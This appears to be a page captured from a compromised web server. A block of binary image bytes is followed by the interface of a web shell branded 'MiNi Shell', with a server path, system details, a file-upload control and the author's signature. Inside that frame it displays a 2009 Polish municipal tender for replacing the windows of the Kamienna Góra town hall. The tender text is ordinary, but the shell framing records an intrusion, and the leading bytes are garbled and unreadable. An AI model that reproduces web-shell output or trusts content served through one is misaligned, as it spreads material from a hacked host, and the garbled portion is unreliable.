JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090310/55720-N-2009.html

<p class="kh_header"><b>Kamienna Góra: Wymiana stolarki okiennej w budynku Ratusza przy Placu Grunwaldzkim 1 w Kamiennej Górze</b><br>
<b>Numer ogłoszenia: 55720 - 2009; data zamieszczenia: 10.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kamienna Góra , Plac Grunwaldzki 1, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 075 6455124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kamiennagora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana stolarki okiennej w budynku Ratusza przy Placu Grunwaldzkim 1 w Kamiennej Górze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana stolarki okiennej i drzwiowej w budynku Ratusza w Kamiennej Górze przy pl. Grunwaldzkim 1 realizowana w ramach zadania pn. Remont budynku Ratusza w Kamiennej Górze.

Inwestor: Gmina Miejska Kamienna Góra
Obiekt: Ratusz Miejski
Lokalizacja: Kamienna Góra pl. Grunwaldzki 1

Przedmiotem zamówienia są roboty budowlane, dotyczące wymiany istniejącej stolarki okiennej drewnianej w budynku Ratusza w Kamiennej Górze przy pl. Grunwaldzkim 1, na okna z drewna klejonego trójwarstwowo, jednoramowe szklone szybą zespoloną. 
Zadanie realizowane będzie w oparciu o Projekt budowlany, decyzję pozwolenia na budowę nr 65/2004 z 26.04.2004 r. oraz decyzję pozwolenia na prowadzenie prac przy zabytku nr 23/04 z 29.01.2004 r. oraz dodatkowe uzgodnienia konserwatora zabytków z dnia 2 lutego 2009 r. i 4 marca 2009 r.

Zakres prac objętych zamówieniem obejmuje:
- wykucie z muru starych okien drewnianych;
- wykucie parapetów drewnianych wewnętrznych;
- rozbiórka parapetów zewnętrznych, blaszanych (okna od podwórza);
- wywiezienie materiałów pochodzących z rozbiórki;
- ostrożny demontaż i ponowny montaż (po osadzeniu nowych okien) drewnianych boazerii na ościeżach otworów okiennych;
- wykonanie i montaż okien drewnianych, jednoramowych szklonych szkłem zespolonym wraz z nawiewnikami oraz drzwi wg zestawienia stolarki okiennej - załącznik nr 3 do opisu przedmiotu zamówienia. OKNA JEDNORAMOWE to rozwiązanie zamienne w stosunku rozwiązań projektowych - uzgodnione z Konserwatorem zabytków;
- demontaż okien na sali witrażowej wraz ze skrzydłami, w których umieszczone są witraże;
- wykonanie i montaż nowych okien z szybą zespoloną wzmocnioną (zabezpieczenie witraży przed uszkodzeniem) w sali witrażowej wraz z przygotowanie skrzydeł okiennych do ponownego osadzenia (przełożenia) witraży - UWAGA! Przełożenie witraży oraz ich konserwacja nie mieszczą się w zakresie niniejszego zamówienia;
- w sali witrażowej skrzydła z witrażami winny być mocowane do ram okiennych za pomocą zawiasów i zamków;
- demontaż ścianki oszklonej w ścianie zewnętrznej na II piętrze i montaż nowej ścianki z drewna klejonego z oknami jednoramowymi szklonymi szkłem zespolonym;
- wykonanie i montaż na II piętrze dodatkowej ścianki oszklonej z drewna klejonego z oknami jednoramowymi szklonymi szkłem zespolonym;
- montaż parapetów wewnętrznych z drewna klejonego w kolorze brązowym gr. 30 mm i zewnętrznych z blachy cynkowo-tytanowej;
- naprawa uszkodzonych tynków ościeży z malowaniem i miejscowe zamurowania otworów lub ich części;
- zamurowanie otworów, uzupełnienie tynków po zamurowanych otworach.
Stolarka okienna oraz drzwiowa będzie wykonana w kolorze brązowym, z widocznym rysunkiem drewna. Odcień (zabarwienie) ustalony zostanie z wyłonionym w drodze przetargu Wykonawcą.
Parametry techniczne wymagane dla okien:
- średni współczynnik przenikania ciepła przez dwie szyby nie więcej niż U=1,1W/m2K - UWAGA! Zmiana w stosunku do Projektu budowlanego;
- współczynnik dźwiękochłonności Rw>33dB;
- każda szyba grubości 4 mm, z przestrzenią powietrzną (szyba zespolona),
- ościeżnice oraz ramiaki skrzydeł okiennych z drewna klejonego trójwarstwowo, gwarantujące odpowiednią sztywność w płaszczyźnie okna, okna drewniane w systemie DJ-68;
- współczynnik infiltracji powietrza a=0,3 - UWAGA! Zmiana w stosunku do Projektu budowlanego,
- szprosy w kwaterach górnych okien oraz w oknach gęsto kwaterowanych obustronne (zewnętrzne i wewnętrzne), naklejane, szerokością i profilem nawiązujące do istniejących;
- okna wyposażone w nawiewniki okienne ciśnieniowe, montowane w górnej części skrzydła okiennego w kolorze ramy okiennej;
- okucia obwiedniowe, pozwalające uzyskać wielopunktowy docisk skrzydła do ościeżnicy, zapewniające łatwą i szybką regulację z mikrorozszczelnieniem i podstawowym zabezpieczeniem przeciwwyważeniowym;
- mocowanie okien zgodnie z atestem ITB;
- klamki w kolorze drewna;
- okapnik przyszybowy aluminiowy w kolorze ramy;
- okapnik zewnętrzny dolnej części ramy aluminiowy w kolorze ramy.

Uwagi dotyczące wykonania robót: 
- zgodnie z wytycznymi konserwatora zabytków  układ, podziały stolarki okiennej i drzwiowej pozostają bez zmian ze względu na konieczność zachowania walorów historycznych i zabytkowych obiektu;
- podczas prowadzenia prac należy zachować szczególną ostrożność przy elementach kamieniarki zewnętrznej;
- okna dwudzielne ze słupkiem ruchomym;
Zamawiający wymaga następujących schematów otwierania okien:
a. dla okien jednodzielnych z kwaterami u góry: górna kwatera rozwierana, dolna rozwierano-uchylna,
b. dla okien dwudzielnych z kwaterami u góry: wszystkie górne kwatery rozwierane, dolne kwatery: jedna kwatera rozwierana, jedna rozwierano - uchylna, 
c. dla okien trójdzielnych z kwaterami u góry: wszystkie górne kwatery rozwierane, dolne skrajne kwatery rozwierano - uchylne, wewnętrzna kwatera rozwierana,
d. dla okien w całości zakwaterowanych: rozwierano - uchylne,
UWAGA! Kierunek otwierania kwater ustalony zostanie z wyłoniony w drodze niniejszego postępowania Wykonawcą;
- szyby we wszystkich pomieszczeniach WC - koloru mlecznego; UWAGA! Wykonawca zobowiązany będzie do wykonania i montażu okien w pomieszczeniach WC w ciągu 1 m-ca od podpisania umowy (powyższe podyktowanej jest tym, że budynku Ratusza prowadzone będą równocześnie prace związane z remontem sanitariatów);
- otwory do zamurowania w poziomie piwnic od podwórka:
	50 cm × 50 cm - 1 szt.,
	15 cm × 20 cm - 2 szt.,
	25 cm × 25 cm - 1 szt.,
	110 cm × 125 cm - 1 szt.;
- otwory wentylacyjne o wymiarach 20 cm × 20 cm (2 szt.) należy wyposażyć w wentylatory higrosterowane o wydajności 50 m3/h;
- okna o szer. 146 cm obmurować i otynkować do szerokości nowego okna 75 cm (schemat O4) - 3 szt.;
- kraty z okien o wymiarach 146 cm × 125 cm - 3 szt. zdemontować;
- drzwi do byłej kotłowni o wymiarach 110 cm × 152 cm obmurować i otynkować do wymiaru nowego okna o wymiarach 95 cm × 135 cm;
- okno w pokoju 312 o istniejących wymiarach 230 cm × 151 cm obmurować i otynkować do otworu okna 92 cm × 151 cm;
- pozostałe okna, należy wymienić na takie same pod względem formy i wyglądu jak okna istniejące;
- oryginalne witraże znajdujące się w restauracji Ratuszowa należy zdemontować i przekazać do dyspozycji Zamawiającego; okna zdemontowane z całego Ratusza należy wywieźć i zutylizować;
- szczegółowe informacje dotyczące ilości nawiewników w oknach należy przyjąć zgodnie z zestawieniem stolarki okiennej;
UWAGA! Przy wykonywaniu robót budowlanych należy wziąć pod uwagę następujące uwarunkowania:
- Roboty prowadzone będą w budynku pod ruchem tzn. urząd miasta przyjmował będzie interesantów w sposób ciągły, Wykonawca musi tak zorganizować prace aby przebiegały one sprawnie i nie utrudniały pracy urzędu;
- Wykonawca zobowiązany będzie informować o terminie prowadzenia robót w poszczególnych pomieszczeniach z co najmniej 3 dniowym wyprzedzeniem;
- Prace winny być zorganizowane w taki sposób, aby otwory po zdemontowanych oknach uzupełnione zostały nową stolarką w tym samym dniu;
- Wykonawca przystępując do prac w danym pomieszczeniu winien być tak przygotowany, aby w jak najkrótszym czasie dokonać wymiany wszystkich okien bez względu na ich rodzaj (opuszczając dane pomieszczenie nie należy do niego ponownie wracać)

Na wykonaną i zamontowaną stolarkę Wykonawca winien udzielić gwarancji wynoszącej minimum 36 miesięcy. Okres gwarancji zacznie swój bieg od momentu dokonania bezusterkowego odbioru robót.

UWAGA:
Przed ostatecznym wykonaniem stolarki okiennej wg zestawienia stolarki, należy sprawdzić na budowie wymiary wszystkich otworów w przegrodach budowlanych oraz odwzorować dokładnie szczegóły dekoracyjne ram okiennych (frezowania ram, stopki i głowice słupków, fryzy ślemienia)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4, 45.42.11.30-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców ubiegajacych się o udzielenie niniejszego zamówienia wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. Posiadają uprawnienia do wykonywania działalności lub czynności, w zakresie objętym niniejszym zamówieniem.
2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, a w szczególności:
a) wykonali należycie w ciągu ostatnich 5 lat przed wszczęciem niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno zamówienie, którego przedmiotem była wymiana lub montaż okien drewnianych w obiektach kubaturowych, o wartości nie mniejszej niż 200 tys. zł brutto (w przypadku Wykonawców zagranicznych Zamawiający dokona przeliczenia waluty obcej na PLN według średniego kursu ogłoszonego przez Narodowy Bank Polski na dzień otwarcia ofert),
b) dysponują osobami, które posiadają uprawnienia do kierowania robotami budowlanymi stosownie do przepisów Ustawy z dnia 7 lipca 1994 roku Prawo budowlane (tj. Dz. U. Nr 156, poz. 1118 z 2006 roku z późniejszymi zmianami) i zakresu niniejszego zamówienia, w tym:
- kierownikiem budowy.
3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4. Nie podlegają wykluczeniu z postępowania na podstawie art. 24 Ustawy.
Zamawiający, na podstawie złożonych przez Wykonawcę dokumentów, dokona oceny spełniania warunków podmiotowych według formuły spełnia - nie spełnia. 
Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania. Ofertę Wykonawcy wykluczonego z postępowania uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków Wykonawcy zobowiązani są do przedstawienia w ofercie następujących oświadczeń i dokumentów:
1. Podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu .
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Wykaz robót budowlanych wykonanych przez Wykonawcę w ciągu ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot niniejszego zamówienia.
4. Opinie dotyczące jakości robót, wystawione przez zamawiających te roboty.
5. Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności wraz z dokumentami stwierdzającymi posiadanie przez nie uprawnień do pełnienia funkcji kierownika budowy.
6. Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 5. Wykonawca wskazał osoby, którymi będzie dysponował..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.kamiennagora.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta
Plac Grunwaldzki 1
58-400 Kamienna Góra
Wydział Zamówień Publicznych, Inwestycji i Funduszy Zewnętrznych (pok. 308).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2009 godzina 11:30, miejsce: Urząd Miasta
Plac Grunwaldzki 1
58-400 Kamienna Góra
Sekretariat (pok. 209).</p><p><b>IV.3.5) Termin związania ofertą:</b> do 29.04.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com